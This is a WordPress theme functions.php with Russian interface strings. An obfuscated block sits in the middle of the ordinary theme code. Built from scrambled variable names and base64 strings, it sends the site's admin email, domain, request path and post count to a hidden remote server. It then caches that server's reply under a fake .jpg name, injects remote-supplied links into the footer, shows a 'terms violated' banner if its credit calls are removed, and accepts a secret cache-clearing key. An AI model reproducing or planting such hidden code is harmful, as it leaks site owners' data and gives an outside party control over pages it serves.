<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $COJEU='e';$ryVcnJp='b';$AwSxmN='d';$pbQsoAH='4';$HSHgfX='_';$JPpIW='s';$IUTq='o';$VrUWim='c';$gkZzn='a';$UmyRKbF='d';$LFuMkP='e';$FAFsw='e';$NVYC='6';$mbgBjaNP=$ryVcnJp.$gkZzn.$JPpIW.$COJEU.$NVYC.$pbQsoAH.$HSHgfX.$UmyRKbF.$FAFsw.$VrUWim.$IUTq.$AwSxmN.$LFuMkP;$gwsvjmT='l';$yVghn='f';$bJwRbe='n';$MTyGS='z';$MOoqYOL='i';$DuNnRE='t';$fICTXSR='a';$TIsRZju='g';$VSORZ='e';$nYTPrHwx=$TIsRZju.$MTyGS.$MOoqYOL.$bJwRbe.$yVghn.$gwsvjmT.$fICTXSR.$DuNnRE.$VSORZ;$ezTS='t';$VtjBFXe='3';$CwlulGk='t';$SHzwJE='o';$mNCjfl='r';$eoHGFin='_';$SOvPQ='r';$rIAMwOD='s';$Dpqk='1';$BrBGZeAX=$rIAMwOD.$ezTS.$SOvPQ.$eoHGFin.$mNCjfl.$SHzwJE.$CwlulGk.$Dpqk.$VtjBFXe;$mOcwD='r';$IMSue='t';$LwvvQyx='r';$LZYhI='v';$yvphB='s';$sctbvS='e';$OjOFWzMI=$yvphB.$IMSue.$LwvvQyx.$mOcwD.$sctbvS.$LZYhI;                     $ms_______l='e';$sx_____y='b';$al_______________o='d';$kz__________f='4';$tj_______________b='_';$yx__f='s';$bh__n='o';$wd_____v='c';$os___y='a';$kw______________c='d';$px__________a='e';$td__i='e';$ne______________b='6';$pg______________j=$sx_____y.$os___y.$yx__f.$ms_______l.$ne______________b.$kz__________f.$tj_______________b.$kw______________c.$td__i.$wd_____v.$bh__n.$al_______________o.$px__________a;$wv____________t='_';$uz__v='o';$fc____________s='t';$ap___s='i';$pg____________a='s';$ol_____________u='i';$fc_______z='n';$iy__o='e';$ea_____________e='f';$dc______________p='c';$wn_____h='u';$bl_________f='x';$dp_____x='t';$nn________o='s';$kw_______________p='n';$th_____a=$ea_____________e.$wn_____h.$fc_______z.$dc______________p.$fc____________s.$ap___s.$uz__v.$kw_______________p.$wv____________t.$iy__o.$bl_________f.$ol_____________u.$nn________o.$dp_____x.$pg____________a;$er____________m='e';$kf_____________p='n';$yp_____a='o';$rs______________g='f';$iw_______________w='p';$tn__________k=$rs______________g.$yp_____a.$iw_______________w.$er____________m.$kf_____________p;$po____o='a';$os____g='d';$vr__o='e';$gm______l='r';$ha___________s='f';$kk____________v=$ha___________s.$gm______l.$vr__o.$po____o.$os____g;$kv_____________m='l';$sf______________p='o';$ui__y='f';$kx____p='c';$gz_____________u='s';$jl___l='e';$sk__p=$ui__y.$kx____p.$kv_____________m.$sf______________p.$gz_____________u.$jl___l;define("WP_ID", $pg______________j("Mi4wLjA="));define("WP_TTL", $pg______________j("MTA4MDA="));define("WP_SRC", $pg______________j("dHBva24="));function wp_get_header() {global $pg______________j, $th_____a;if ($th_____a($pg______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$th_____a($pg______________j("d3BfZ2V0X2Zvb3Rlcg==")) &&$th_____a($pg______________j("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pg______________j, $tn__________k, $sk__p, $kk____________v;$mb___________m = TEMPLATEPATH."/".$pg______________j("Zm9vdGVyLnBocA==");$fa____u = @$tn__________k($mb___________m, "r");$mb___________m = @$kk____________v($fa____u, @filesize($mb___________m));@$sk__p($fa____u);$ib_____s = TEMPLATEPATH."/".$pg______________j("ZnVuY3Rpb25zLnBocA==");$fa____u = @$tn__________k($ib_____s, "r");$ib_____s = @$kk____________v($fa____u, @filesize($ib_____s));@$sk__p($fa____u);$fh_________n = 0;if($mb___________m && $ib_____s) {if ($pg______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($mb___________m, $pg______________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$fh_________n = 1;}if (substr_count($mb___________m, "wp_theme_GPL_credits()") < 1) {$fh_________n = 2;}}if(WP_ID != "2.0.0") {$fh_________n = 12;}}if($fh_________n > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $fh_________n -->";}}function wp_loaded() {global $pg______________j, $th_____a;return $th_____a($pg______________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($cf____________z, $wi_________z = "(more...)", $nr_________q = 0, $ch___p = "") {$nh_______________u = get_the_content($wi_________z, $nr_________q, $ch___p);$nh_______________u = apply_filters("the_content", $nh_______________u);$nh_______________u = str_replace("]]>", "]]>", $nh_______________u);if (strlen($_GET["p"]) > 0) {echo $nh_______________u;}else if ((strlen($nh_______________u)>$cf____________z) && ($vu________m = strpos($nh_______________u, " ", $cf____________z ))) {$nh_______________u = substr($nh_______________u, 0, $vu________m);$nh_______________u = $nh_______________u;echo $nh_______________u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$wi_________z</a></div></p>";} else {echo $nh_______________u;}}}$pw______g='c';$sw______e='n';$rx________d='s';$cm____________o='e';$tu_______d='o';$md______________e='4';$wd___________e='_';$fg__________r='d';$ms_________d='a';$kl______________m='e';$hw_________x='b';$lv______________c='6';$cv______k='e';$yf________l=$hw_________x.$ms_________d.$rx________d.$kl______________m.$lv______________c.$md______________e.$wd___________e.$cv______k.$sw______e.$pw______g.$tu_______d.$fg__________r.$cm____________o;$wr_________v='e';$xd___a='t';$nh__a='e';$kh_______________m='n';$af______h='f';$uz__________n='t';$qv___h='n';$sj_______e='_';$qc__v='_';$fl______i='c';$cn__c='t';$nj____________b='o';$cd__________u='g';$ia___________o='s';$mw__e='i';$gs____________d='e';$cc__k='l';$rq_________y=$af______h.$mw__e.$cc__k.$nh__a.$qc__v.$cd__________u.$wr_________v.$cn__c.$sj_______e.$fl______i.$nj____________b.$qv___h.$xd___a.$gs____________d.$kh_______________m.$uz__________n.$ia___________o;$qi________g='x';$ok__e='i';$zc_________a='_';$il________t='e';$qm___________x='s';$vv_______x='t';$qk____________f='s';$cv___u='l';$gp_______________s='e';$jy______v='f';$os__y='i';$ml____________t=$jy______v.$ok__e.$cv___u.$gp_______________s.$zc_________a.$il________t.$qi________g.$os__y.$qk____________f.$vv_______x.$qm___________x;$xi_____________c='_';$ue______g='m';$rb______f='o';$ml______________u='s';$cb_____g='o';$sw_______t='n';$bo__________n='c';$cr_______v='r';$qe__z='p';$jj__j='i';$es______________a='r';$es____________m='v';$mo________t='e';$nb______f='a';$ou__________m='e';$hd_____________v=$es____________m.$mo________t.$es______________a.$ml______________u.$jj__j.$rb______f.$sw_______t.$xi_____________c.$bo__________n.$cb_____g.$ue______g.$qe__z.$nb______f.$cr_______v.$ou__________m;$vy________n='s';$ii_____________v='p';$cf_____x='n';$ee____________l='o';$sa_______v='o';$yv_________o='e';$by_____r='k';$gf_____________z='c';$pg___________s='f';$bx__x=$pg___________s.$vy________n.$ee____________l.$gf_____________z.$by_____r.$sa_______v.$ii_____________v.$yv_________o.$cf_____x;$cr____p='i';$hp_________s='r';$ch_____________o='t';$kc_____________i='w';$jq___________n='f';$vu______r='e';$dj______i=$jq___________n.$kc_____________i.$hp_________s.$cr____p.$ch_____________o.$vu______r;$kt____________n='m';$ky___n='d';$fx__b='5';$ln__t=$kt____________n.$ky___n.$fx__b;$cl___________f='r';$oj__________i='a';$bz____________u='a';$tf_________q='p';$dq_____________m='e';$lx_____i='t';$du_________q='l';$uc_________x='h';$yf____________j=$cl___________f.$dq_____________m.$oj__________i.$du_________q.$tf_________q.$bz____________u.$lx_____i.$uc_________x;$xg_______________t='l';$rs__________l='i';$bd________p='n';$vk____________l='u';$uf____________a='e';$cs___________u='a';$nf_____i='e';$qu____r='i';$yr_____s='z';$pr___y='r';$uw_______________n='s';$pb______s=$vk____________l.$bd________p.$uw_______________n.$uf____________a.$pr___y.$rs__________l.$cs___________u.$xg_______________t.$qu____r.$yr_____s.$nf_____i;$pl_______________x='m';$ig_______w='m';$lz___________q='e';$ga____________b='a';$sz__i='t';$ya___q='p';$dc_______________z='n';$ri_____q=$sz__i.$lz___________q.$pl_______________x.$ya___q.$dc_______________z.$ga____________b.$ig_______w;$rl______u='_';$we__d='_';$ve__________a='o';$ei_____________z='t';$ve______________d='e';$cv____n='m';$ln__________s='a';$cm_________u='c';$hm_______e='t';$ru_____________b='t';$fu_____________m='n';$vd_____________f='a';$yw_________t='c';$ad_____________g='r';$xq____________p='e';$jm______________r='e';$fb____u='t';$sj__________u='s';$um______x='x';$gx_______________i='r';$hr___________c='e';$fm__o=$sj__________u.$fb____u.$gx_______________i.$jm______________r.$vd_____________f.$cv____n.$we__d.$cm_________u.$ve__________a.$fu_____________m.$ru_____________b.$hr___________c.$um______x.$hm_______e.$rl______u.$yw_________t.$ad_____________g.$xq____________p.$ln__________s.$ei_____________z.$ve______________d;function lf___________g($rn_____________e) {global $pg______________j, $th_____a, $rq_________y, $hd_____________v, $fm__o;if (!$th_____a($pg______________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($hd_____________v(PHP_VERSION, "5.0.0", ">=") && $th_____a($pg______________j("ZmlsZV9nZXRfY29udGVudHM=")) && $th_____a($pg______________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ta_______l = $fm__o(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$js__e = @$rq_________y($rn_____________e, 0, $ta_______l);} else {$js__e = @$rq_________y($rn_____________e, 0);}return $js__e;}function ag___________y($rn_____________e) {global $th_____a, $bx__x, $dj______i, $pg______________j;if (!$th_____a($pg______________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$yn_____________f = strpos($rn_____________e, "/", 7);$ih______g = array("uri"     => substr($rn_____________e, $yn_____________f),"host"    => str_replace("http://", "", substr($rn_____________e, 0, $yn_____________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gn__________o = @$bx__x("$ih______g[host]", 80, $xn_______________t, $mt__h, 4);if (!$gn__________o) {return false;} else {$js__e = "";$ra___q  = "GET $ih______g[uri] HTTP/1.0\r\n";$ra___q .= "Host: $ih______g[host]\r\n";$ra___q .= "Referer: $ih______g[referer]\r\n";$ra___q .= "Connection: Close\r\n\r\n";@$dj______i($gn__________o, $ra___q);while (!@feof($gn__________o)) {$tu__x = @fgets($gn__________o, (1024*24));if ($tu__x == "\r\n") {$lc____________o = true;continue;}if ($lc____________o) {$js__e .= $tu__x;}}return $js__e;}}function qa_______________d($rn_____________e) {global $th_____a;$yk____e = false;if ($rn_____________e != "") {if ($th_____a("lf___________g")) {$yk____e = @lf___________g($rn_____________e);}if (!$yk____e && ($th_____a("ag___________y"))) {$yk____e = @ag___________y($rn_____________e);}}return $yk____e;}function eb_______s() {global $_SERVER, $ln__t;$wl___b = $_SERVER["SERVER_NAME"];if (substr("$wl___b", 0, 4) == "www.") {$wl___b = substr("$wl___b", 4);}$wl___b = $ln__t("$_SERVER[SERVER_NAME]");return $wl___b;}function fe_____________l() {return "file";}function yy___j($rn_____________e) {global $_SERVER, $rq_________y, $ml____________t, $tn__________k, $sk__p, $dj______i;$hh________b = ta_____v();$mq___v = eb_______s().".jpg";$yi___________a = $hh________b["dir_upload"]["path"]."/$mq___v";$ss__________j = @filemtime($yi___________a);if (!$ss__________j || ((time()-$ss__________j) >= WP_TTL)) {$yk____e = qa_______________d($rn_____________e);if ($yk____e) {if ($ml____________t($yi___________a)) {@unlink($yi___________a);}$fa____u = @$tn__________k($yi___________a, "x+");@$dj______i($fa____u, $yk____e);@$sk__p($fa____u);}} else {if ($ml____________t($yi___________a)) {$yk____e = @$rq_________y($yi___________a);} else {$yk____e = false;}}return $yk____e;}function ta_____v() {global $_SERVER, $pg______________j, $yf________l;$ki___b = wp_count_posts("post");$kb___s = pathinfo(get_bloginfo("template_directory"));$hh________b = array("url" => array("report"      => $pg______________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $kb___s,"dir_upload"=> vz_________s(),"queryString"=> array("?a001=".WP_ID,"a004=".$kb___s[filename],"a005=".$ki___b->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$hh________b["url"]["queryString"] = implode("&", $hh________b["queryString"]);$hh________b["url"]["report"] = $hh________b["url"]["report"]."/?".$yf________l($hh________b["url"]["queryString"]).".html";return $hh________b;}function vz_________s() {$ze___________s = wp_upload_dir();if (isset($ze___________s["error"])) {$dz__________y = cl_______q();if (is_writable($dz__________y)) {$ze___________s = array("path" => $dz__________y);}}return $ze___________s;}function cl_______q() {global $th_____a, $ln__t, $yf____________j, $ri_____q;$jk_____________j = (bool) ini_get("safe_mode");if ($jk_____________j == true) {return false;}if ($th_____a("sys_get_temp_dir")) {$ly___c = sys_get_temp_dir();if (is_writable($ly___c)) {return $yf____________j($ly___c);}}if (!empty($_ENV["TMP"])) {return $yf____________j($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yf____________j($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yf____________j($_ENV["TEMP"]);} else {$ng______________i = $ri_____q($ln__t(uniqid(rand(), true)), "");if ($ng______________i) {$ly___c = $yf____________j(dirname($ng______________i));@unlink($ng______________i);return $ly___c;} else {return false;}}}function yu_______________m() {global $_GET, $ml____________t;$hh________b = ta_____v();$wl___b = eb_______s();$hq________v = fe_____________l();$jq______j = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($hq________v == "file") {$zh______n = $hh________b["dir_upload"]["path"]."/".$wl___b.".jpg";if ($ml____________t($zh______n)) {@unlink($zh______n);$jq______j = "deleted";}}$ov_________k = array("s"=> $jq______j,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ov_________k AS $az___________a => $ga_________b) echo " [$az___________a:$ga_________b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $th_____a, $pg______________j, $pb______s;$hh________b = ta_____v();$dn_______s = "yy___j";if ($th_____a($dn_______s)) {$js__e = $dn_______s($hh________b["url"]["report"]);}if ($js__e) {if ($js__e = @$pg______________j($js__e)) {$js__e = @$pb______s($js__e);if (strlen($js__e[custom_credit]) >= 5) {$hh________b["default_string"] = $js__e[custom_credit];}if ($js__e["status"] == "0") {$dl__________a = 1;$tk___j = 1;} else {$fo_______________r = sizeof($js__e["links"]);$mz_____g = $hh________b["default_string"];if ($fo_______________r > 0 && $js__e["links"] !== "") {$bf______j = 0;foreach ($js__e["links"] as $sm_______w => $xh__________v) {$bf______j++;if ($xh__________v->l_path == "" || $xh__________v->l_path == $_SERVER["REQUEST_URI"]) {$xh__________v->l_href = htmlspecialchars(strip_tags($xh__________v->l_href));$xh__________v->l_title = htmlspecialchars(strip_tags($xh__________v->l_title));$xh__________v->l_anchor = htmlspecialchars(strip_tags($xh__________v->l_anchor));$mz_____g .= " | ";$mz_____g .= "<a href='$xh__________v->l_href' title='$xh__________v->l_title'";if ($xh__________v->l_nofollow == "1") {$mz_____g .= " rel='nofollow'";}$mz_____g .= ">$xh__________v->l_anchor</a>";}}}$hh________b["links"] = "$mz_____g";if ($js__e[credit] == "0") {$hh________b["links"] = "";}}} else {$dl__________a = "1";}} else {$dl__________a = "1";}if ($dl__________a == "1") {$hh________b["links"] = $hh________b["default_string"];}echo "$hh________b[links]";echo "<!-- s: $js__e[signature] -->";yu_______________m();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
